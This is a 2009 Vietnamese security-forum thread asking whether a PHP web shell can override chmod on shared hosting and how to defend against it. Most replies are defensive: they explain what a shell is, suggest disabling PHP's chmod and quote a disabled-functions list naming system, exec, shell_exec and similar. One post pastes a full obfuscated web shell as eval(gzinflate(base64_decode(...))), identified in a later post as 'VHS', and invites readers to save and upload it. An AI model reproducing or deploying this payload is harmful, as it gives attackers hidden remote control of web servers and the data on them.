banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko?  XML
  [Question]   Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 08/02/2009 13:13:41 (+0700) | #1 | 168682
AntiBlackSite
Member

[Minus]    0    [Plus]
Joined: 15/01/2009 20:42:07
Messages: 4
Offline
[Profile] [PM]
Hiện nay theo tôi được biết thì đã có shell can edit chmod vậy các biện pháp bảo mật dành cho host share chắc ko còn tác dụng vì chmod kĩ thế nào cũng bị edit vậy có cách nào chống cái này ko?
Mong các bạn giúp đỡ.
[Up] [Print Copy]
  [Question]   Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 08/02/2009 22:16:46 (+0700) | #2 | 168717
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

AntiBlackSite wrote:
Hiện nay theo tôi được biết thì đã có shell can edit chmod vậy các biện pháp bảo mật dành cho host share chắc ko còn tác dụng vì chmod kĩ thế nào cũng bị edit vậy có cách nào chống cái này ko?
Mong các bạn giúp đỡ.
 


"can edit chmod" là gì vậy?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 12/02/2009 07:54:09 (+0700) | #3 | 169161
AntiBlackSite
Member

[Minus]    0    [Plus]
Joined: 15/01/2009 20:42:07
Messages: 4
Offline
[Profile] [PM]

conmale wrote:

AntiBlackSite wrote:
Hiện nay theo tôi được biết thì đã có shell can edit chmod vậy các biện pháp bảo mật dành cho host share chắc ko còn tác dụng vì chmod kĩ thế nào cũng bị edit vậy có cách nào chống cái này ko?
Mong các bạn giúp đỡ.
 


"can edit chmod" là gì vậy? 


Shell này có thể edit lại các folder đã chmod của ta ví dụ chmod 101 thì edit lại 777 từ đó làm gì làm smilie
[Up] [Print Copy]
  [Question]   Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 12/02/2009 10:31:00 (+0700) | #4 | 169177
nbthanh
HVA Friend

Joined: 21/12/2001 14:51:51
Messages: 429
Offline
[Profile] [PM]

AntiBlackSite wrote:
Hiện nay theo tôi được biết thì đã có shell can edit chmod vậy các biện pháp bảo mật dành cho host share chắc ko còn tác dụng vì chmod kĩ thế nào cũng bị edit vậy có cách nào chống cái này ko?
Mong các bạn giúp đỡ.
 

Shell (web-based?) chỉ là phương tiện giúp bạn thực thi các lệnh trên server y như là bạn đang mở 1 cửa sổ console trên đó.
Như vậy, nếu có lệnh nào đó có thể "qua mặt" được chmod của *NIX thì shell nào cũng có thể làm được chứ làm gì có chuyện "đã có shell can edit chmod".
[Up] [Print Copy]
  [Question]   Re: Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 20/02/2009 12:11:58 (+0700) | #5 | 170192
muaban5s
Member

[Minus]    0    [Plus]
Joined: 19/02/2009 23:28:07
Messages: 2
Offline
[Profile] [PM]
Tớ có con shell c99 thấy chức năng cmod nhưng tớ thử cmod nhưng có tác dụng đâu cơ chứ. Nếu như bạn nói quả thật có con shell mà có thể cmod đc hết như cpanel thì nói thật chả site nào bảo mật đc cả hihih
[Up] [Print Copy]
  [Question]   Re: Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 20/02/2009 17:32:51 (+0700) | #6 | 170217
[Avatar]
hoahongtim
Researcher

Joined: 15/07/2002 02:59:49
Messages: 156
Location: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cấm dùng hàm chmod trong PHP nếu cảm thấy lo lắng! smilie
[Up] [Print Copy]
  [Question]   Re: Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 21/02/2009 11:29:39 (+0700) | #7 | 170320
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]
chơi mà chơi shell . nghỉ chơi luôn

Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
  [Question]   Re: Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 26/02/2009 10:59:41 (+0700) | #8 | 171050
AntiBlackSite
Member

[Minus]    0    [Plus]
Joined: 15/01/2009 20:42:07
Messages: 4
Offline
[Profile] [PM]
<? eval(gzinflate(base64_decode('
3RrbchpH9n2r8g+tidYNFQQSkmNH1iBhQILSBRUg
e9n1FtUwDUwxt5qL5HHK37c/kff8QZ7ysKcvc2VA
klep3Sx2Caanz/3S53T3aePk1Fk63/1lV6NzEhi+
utvut+6uOzejyaDfH72DN/5S9yZz3aCqUq3Nlqat
VQFEgVfinz4v6Z5H/dKuR+5pufwzwMwtYlLV892J
Sx2DzGhJQUpFmSgV8ar8rnjSX+v7+WlLSjTqlpQW
mS3p3sy2fNc2jpHj6vfEp0pmCryklr/nhw49RsRx
DH1GfN22anPbndE9zX6wDJtohUBX1Fr4y2OkVJms
nv6FRgIVTG7rnmN7OsMNhHwfeDNh/B1isFwsIQCn
xER1kIrmtkMtgbSCsIvZu7lDPM9fukEJ5vCBmWF7
NHoKrESx8Eg/6z58fRVqRyU0D6wZY2ICbzzfK2Hd
0icL6uMyKiNmCNuy53OgLcdL2KULmEndycKwp8Tw
OBdfETU8mgGAyZPZfDG5J+4mIMGDhNhR0QEneUY/
+y6ZAdeT2/5wVEGdv40Gk+Fl75YBpd5edPIvvwqH
ioRCGjV8l4Iy4Iemu0IiM4Sf6hn8iccB9GEJiget
MTcVU/YaLhitVOZQ4KPgpBMGpEioGp+swPvmTRsJ
0B1wcSU/UFUEjjPu+3n4yv6bN28YBxGzefyJpmQY
FXDwOPazwDJ0a7UB+9dIL3sN4T4cJIsxwUVnSxud
uWZahegUKSczcGHqNk6mjZM5ODqa2Ybtqvj7ffic
n+PGcHw1vmmPjzM8nNRgeo3Nhy+JQUHHKXQpXJ+U
7+dzhu6T0hjqIBE1qabnEeaQpT1+13ZUFUP+0a25
jUWusa3VZEWcnNMqbNzTQ9syiBuyCcRXYvF3JQq1
tEOZd5cUOcBSj0RI/DLTi3xRKqeFSgYvbTPwA/Qv
YoSnZhjqup7hPB+yQgCTct45K8rJ0jeNxnd/OWFZ
hn37um/QxjBwHOqiLpmt4GsWzDRSdWngLG1rgeau
baIP3dZJTUwGqFoEPrW1EE0Xaevt72PkQ+glxkTM
nVKP97lnEj+fnwM0wyulAqrowrUDp1qtxqImr0+m
YorvBoxR37bYCGNLjN8HMGoSa1lJxnvIsO8pkyc7
qMOgbq2NYxMtbFtDS66a1KuxHTCm0s+IuBQ9UGNm
mzTzLmMlcCOPhLqK3+AkmbCRhnqQMlTGo9kSoWI+
C8ehcs4/uJE1Vz6c3jKDNLgRpbej7BSmczYl1nU8
rSA4OAt7e8LL+ENdxQc5Qeon6psnSFLHa2wKUe6X
s7OFSXSjOouZXuei/sMPjA2uUUmpxtxR+Cdz83xM
PBIETAHDJTUMdF+vHhR4+xP8nYuBsv6c8nfxXODv
gnMlLUyB2n44xGtmgwyKYs53dnbQrf0AaUZD0zAX
yEXZU/poEa36uqcxOhGGjVMFW91m67IziCbHkaC8
W5OPoKVL5yqu1pLy75Stu7vwJ+/dMkWd1EjWIyTO
Z1CA3BilduQTF9K5iidTg1gr3Ljt3qLezXn/Zcg8
eMw0rxKRPnbeo2G3c3W1Bb9Q1yal7e3tbaYHCX9N
omr6cwqfzECVMwJIc4lKEN37E3xSKtL0exZhC0tN
1ou0sx7gtWLjJGgMbNtH57arMecKGsco25xkHTmL
bgM2qI/R3eAKe7pAuPR957hW2+2ORreTLpSru4NO
uzfotEYTmJbKza6JTOovbU2Fut9HhBeoamJjaRyo
M3dkM8SqKl6fMB9Tov5KFjNSLbrlBD5i7YrKspVg
/8d9xDsIgEP3xAhYauYuCkKmALxgaup+NOOiN8KR
Jli3Y/IfoPaYsaj0EJ6fLj/YYliUbA7WMwhEiQyS
9QVAlLhcdnvFRWcj1HT8sLS7sjU+pOkUlQpLw4TI
uNPs8vR5Mejf3SIeCoJcRK2c0WLaOvgWzIMj+zwe
9hszYKFpDl8L04A0sWngN24UGIZPtFfRvFbzqjcc
9QY4k0WSnC+MVsDICFqk5qDTRK794KmH+0xdnvr2
NWLtDRS3YoXyQujPTCj2gZ2kyoXVNwJvFFWlUeeX
MpQ03f+CaluQMTxfd02yQqz91PQFtLFf0EpU3NPA
JSFBC93Vrf+KBRqPaPfrWtkfOKJlgdZiyeI7s7o8
Jw6hwGiiOzQAFwjRphpCBGUUk1ooGk0+Jo2t2V5I
JgvbggzLzZ5sBMxsJ0QllJlSQcoub9PSgxOxz8Ea
JTCEz/rN/FtU3E7mK6E4myus1XoqtkglK2CYwMJK
TNBJBlnSfhXJXX+C4PVCyevbRa9vkz3iVpOchlvl
rv8Rgh8+QfDDQsEPtwt++LJGP/wjhD96gvBHhcIf
bRf+6GWFP/rPhI/Se6yCEIksIFLQrshB7AupkfCa
/kW34szE3qVy4nl/cI06N63R+LajYhMqGt0hrs9z
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
192MzKeNk9N/Aw==
'))); ?>  



Con shell đây save lại up lên ngâm cứu.
[Up] [Print Copy]
  [Question]   Re: Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 27/02/2009 05:05:09 (+0700) | #9 | 171161
anhyeutrinh
Member

[Minus]    0    [Plus]
Joined: 07/08/2007 16:11:00
Messages: 2
Offline
[Profile] [PM]
uid= ( ) gid= ( )
hình như muốn change được chmod còn phải dựa vô cái này thì phải
[Up] [Print Copy]
  [Question]   Re: Hiện nay đã có shell can edit chmod vậy có cách nào bảo mật ko? 27/02/2009 14:20:25 (+0700) | #10 | 171244
sangteamtham
Member

[Minus]    0    [Plus]
Joined: 13/11/2008 18:34:26
Messages: 27
Location: Việt Nam
Offline
[Profile] [PM]
Đây là con VHS. Hê hê. Nó nằm chết dí trên server có cấu hình như thế này:

Safe-Mode: OFF (not secure)
126 Disabled PHP Functions:
passthru, system, shell_exec, exec, proc_open, proc_close, popen, shell, getphpcfg, deltree, escapeshellarg, escapeshellcmd, curl_exec, symlink, load_file, chroot, chown, chgrp, disk_free_space, disk_total_space 


Khi server disable chmod thì bố nó cũng bó tay. Ko có cách nào khác là liên hệ trao đổi với admin server về vấn đề này.
Một sự việc và hàng tỉ cái đầu
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|